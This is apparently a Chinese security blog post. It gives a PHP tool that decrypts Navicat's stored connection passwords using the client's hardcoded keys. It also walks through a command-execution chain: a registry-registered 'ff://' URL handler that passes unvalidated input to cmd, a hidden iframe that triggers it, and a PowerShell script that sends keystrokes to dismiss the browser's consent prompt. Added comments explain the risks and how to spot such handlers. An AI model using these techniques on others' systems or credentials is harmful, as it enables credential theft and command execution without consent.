
navicat解密保存密码

使用php解密密码

我在 CodeRunner 中运行 PHP。这段代码稍作修改后可以作为单文件直接使用：替换下方的密码字段，并取消对应版本那一行的注释。

<?php

namespace FatSmallTools;

/**
 * Encrypts and decrypts passwords in the format Navicat stores them in.
 *
 * Version 11 uses Blowfish (single blocks via BF-ECB) chained with XOR, keyed by
 * the raw SHA-1 of a fixed seed; version 12 uses AES-128-CBC with a fixed key and IV.
 * Both keys are constants baked into the client, so the stored value offers no
 * confidentiality to anyone who can read it: connection files and exports that
 * contain these hex strings need to be protected like the plaintext password itself.
 */
class NavicatPassword
{
    // Navicat major version selecting the format: 11 or 12. Any other value makes
    // encrypt()/decrypt() return false.
    protected $version = 0;
    // Fixed AES-128-CBC key and IV of the version-12 format.
    protected $aesKey = 'libcckeylibcckey';
    protected $aesIv = 'libcciv libcciv ';
    // Seed of the version-11 Blowfish key. Kept for compatibility; the constructor
    // hashes the same literal directly rather than reading this property.
    protected $blowString = '3DC5CA39';
    // Filled in by the constructor: raw SHA-1 of the seed, and a fixed 8-byte IV.
    protected $blowKey = null;
    protected $blowIv = null;

    /**
     * @param int $version Navicat version whose format to use (11 or 12; default 12).
     */
    public function __construct($version = 12)
    {
        $this->version = $version;
        // Binary (not hex) digest: the 20-byte SHA-1 output is the Blowfish key.
        $this->blowKey = sha1('3DC5CA39', true);
        $this->blowIv = hex2bin('d9c7c3c8870d64bd');
    }

    /**
     * Encrypt a plaintext password into the upper-case hex form Navicat stores.
     *
     * @param string $string Plaintext password.
     * @return string|false Upper-case hex ciphertext, or false if the version is not 11 or 12.
     */
    public function encrypt($string)
    {
        // Loose comparison kept on purpose: numeric strings such as "12" are accepted too.
        if ($this->version == 11) {
            return $this->encryptEleven($string);
        }
        if ($this->version == 12) {
            return $this->encryptTwelve($string);
        }

        return false;
    }

    /**
     * Version-11 encryption: each full 8-byte block is XORed with a chaining value,
     * Blowfish-encrypted, and the chaining value is then XORed with that ciphertext.
     * A trailing partial block is XORed with the Blowfish encryption of the chaining value.
     *
     * @param string $string Plaintext password.
     * @return string Upper-case hex ciphertext (same length in bytes as the input).
     */
    protected function encryptEleven($string)
    {
        $length = strlen($string);
        $fullBlocks = intdiv($length, 8);
        $tail = $length % 8;
        $vector = $this->blowIv;
        $out = '';

        for ($block = 0; $block < $fullBlocks; $block++) {
            $plain = substr($string, $block * 8, 8);
            $cipher = $this->encryptBlock($this->xorBytes($plain, $vector));
            $vector = $this->xorBytes($vector, $cipher);
            $out .= $cipher;
        }

        if ($tail > 0) {
            // Partial block: keystream is the encrypted chaining value, no padding is added.
            $vector = $this->encryptBlock($vector);
            $out .= $this->xorBytes(substr($string, $fullBlocks * 8, $tail), $vector);
        }

        return strtoupper(bin2hex($out));
    }

    /**
     * Blowfish-encrypt one raw 8-byte block (ECB, no padding).
     *
     * @param string $block Exactly 8 bytes.
     * @return string|false Ciphertext block, or false if OpenSSL rejects the call
     *                      (e.g. Blowfish unavailable in the loaded provider).
     */
    protected function encryptBlock($block)
    {
        $flags = OPENSSL_RAW_DATA | OPENSSL_NO_PADDING;

        return openssl_encrypt($block, 'BF-ECB', $this->blowKey, $flags);
    }

    /**
     * Blowfish-decrypt one raw 8-byte block (ECB, no padding).
     *
     * @param string $block Exactly 8 bytes.
     * @return string|false Plaintext block, or false on OpenSSL failure.
     */
    protected function decryptBlock($block)
    {
        $flags = OPENSSL_RAW_DATA | OPENSSL_NO_PADDING;

        return openssl_decrypt($block, 'BF-ECB', $this->blowKey, $flags);
    }

    /**
     * Byte-wise XOR of two strings over the length of the first one.
     *
     * @param string $str1 Determines the output length.
     * @param string $str2 Must be at least as long as $str1.
     * @return string
     */
    protected function xorBytes($str1, $str2)
    {
        $count = strlen($str1);
        $out = '';
        for ($pos = 0; $pos < $count; $pos++) {
            $out .= chr(ord($str1[$pos]) ^ ord($str2[$pos]));
        }

        return $out;
    }

    /**
     * Version-12 encryption: AES-128-CBC with the fixed key/IV, PKCS#7 padded by OpenSSL.
     *
     * @param string $string Plaintext password.
     * @return string Upper-case hex ciphertext.
     */
    protected function encryptTwelve($string)
    {
        $raw = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);

        return strtoupper(bin2hex($raw));
    }

    /**
     * Decrypt a stored hex value back to the plaintext password.
     *
     * @param string $string Hex ciphertext as found in Navicat's storage (case-insensitive).
     * @return string|false Plaintext, or false if the version is not 11 or 12
     *                      (version 12 also yields false when OpenSSL rejects the ciphertext).
     */
    public function decrypt($string)
    {
        // Loose comparison kept on purpose, matching encrypt().
        if ($this->version == 11) {
            return $this->decryptEleven($string);
        }
        if ($this->version == 12) {
            return $this->decryptTwelve($string);
        }

        return false;
    }

    /**
     * Inverse of encryptEleven(): chaining value is XORed with each ciphertext block,
     * and a trailing partial block is recovered with the same encrypted-vector keystream.
     *
     * @param string $upperString Hex ciphertext.
     * @return string Plaintext (empty when the hex cannot be decoded).
     */
    protected function decryptEleven($upperString)
    {
        $cipher = hex2bin(strtolower($upperString));
        $length = strlen($cipher);
        $fullBlocks = intdiv($length, 8);
        $tail = $length % 8;
        $vector = $this->blowIv;
        $plain = '';

        for ($block = 0; $block < $fullBlocks; $block++) {
            $chunk = substr($cipher, $block * 8, 8);
            $plain .= $this->xorBytes($this->decryptBlock($chunk), $vector);
            // Chain on the ciphertext block, mirroring encryptEleven().
            $vector = $this->xorBytes($vector, $chunk);
        }

        if ($tail > 0) {
            $vector = $this->encryptBlock($vector);
            $plain .= $this->xorBytes(substr($cipher, $fullBlocks * 8, $tail), $vector);
        }

        return $plain;
    }

    /**
     * Inverse of encryptTwelve(): AES-128-CBC decryption with the fixed key/IV.
     *
     * @param string $upperString Hex ciphertext.
     * @return string|false Plaintext, or false if OpenSSL rejects the input (bad length/padding).
     */
    protected function decryptTwelve($upperString)
    {
        $cipher = hex2bin(strtolower($upperString));

        return openssl_decrypt($cipher, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
    }
}


use FatSmallTools\NavicatPassword;

// Navicat version whose on-disk format the stored value uses: 11 or 12.
$version = 12;
// Hex ciphertext copied from the saved connection. Both values are the original
// post's samples; the first belongs to the version-11 format, the second to version 12.
$encoded = $version == 11 ? '15057D7BA390' : '764057479667225EEF500CD6E6F88FCD';

$navicatPassword = new NavicatPassword($version);
$decode = $navicatPassword->decrypt($encoded);
echo $decode, "\n";

-w900

x4IiVuKLYx

https://github.com/HyperSine/how-does-navicat-encrypt-password
https://github.com/tianhe1986/FatSmallTools

自定义URL Protocol协议+模拟点击拉起应用/执行命令

起因是有个开发的朋友在群里问到怎么用js检测系统是否存在某应用。

-w327

后来想了下,一般都是利用js+URL Protocol来拉起应用,而且拉起过程中会出现选择。
之前刚刚做了个c# bypass uac中模拟了回车键。
这回直接用这个执行命令应该也可以。

注册自定义URL协议

add.reg

Windows Registry Editor Version 5.00
; Registers "ff" as a URL scheme handler; the empty "URL Protocol" value is what makes
; browsers treat ff:// links as launchable.
[HKEY_CLASSES_ROOT\ff]
"URL Protocol"=""
@="Genaral Call"
[HKEY_CLASSES_ROOT\ff\DefaultIcon]
@=""
[HKEY_CLASSES_ROOT\ff\shell]
[HKEY_CLASSES_ROOT\ff\shell\open]
; The handler passes the whole URL (%1) to cmd with delayed expansion: the "ff://"
; prefix is stripped, commas are turned into spaces, and the remainder is started as-is.
; Nothing validates the path or arguments, so any page that can navigate to an ff://
; URL reaches this command line.
; Defender note: scheme handlers of this kind show up as writes under
; HKEY_CLASSES_ROOT\<scheme>\shell\open\command; auditing and baselining those keys
; is the practical way to spot them.
[HKEY_CLASSES_ROOT\ff\shell\open\command]
@="cmd /v:on /k set m=%1 &&call set n=%%m:ff://=%%&call set n=%%n:,= %% &&start !n! &exit"

测试URL

 ff://C:/windows/system32/calc.exe

-w1311
-w476

如何触发

浏览器对协议地址发起请求,那么我用iframe来嵌入窗口,而且iframe可以设置宽高为零彻底隐藏。

<iframe src="ff://C:/net1.exe.lnk"></iframe>

执行命令思路

  1. 可以利用注册协议的参数
    ff://参数1[,参数2,参数3]
    其中参数1是要打开的本地程序的完整路径;参数2,参数3是要传递给该本地程序的参数,
  2. 可以利用lnk文件来执行
    -w693

模拟点击组合实现命令执行

1.ps1

# Defender note: the browser's "open external application?" prompt is the only
# user-consent step between a web page and a registered scheme handler. This script
# focuses the browser window and injects TAB + ENTER to dismiss that prompt, so the
# prompt by itself is not a reliable control; the risk sits in scheme handlers that
# pass unvalidated arguments to cmd (see add.reg above), which should not be registered.
C:\1.html   //打开1.html调用url
$myshell = New-Object -com "Wscript.Shell" 
$myshell.AppActivate("chrome") //激活title是chrome进程的焦点
start-sleep -s 1
$myshell.sendkeys("{TAB}")
$myshell.sendkeys("{ENTER}") //发送 tab和回车

Jietu20200406-010911

同样修改下ps1的发送键位和激活名称比如IE是WINDOWS$myshell.AppActivate("windows")
也可以实现命令执行。

Jietu20200406-015303

Jietu20200406-015351
Jietu20200406-155246

Jietu20200406-155239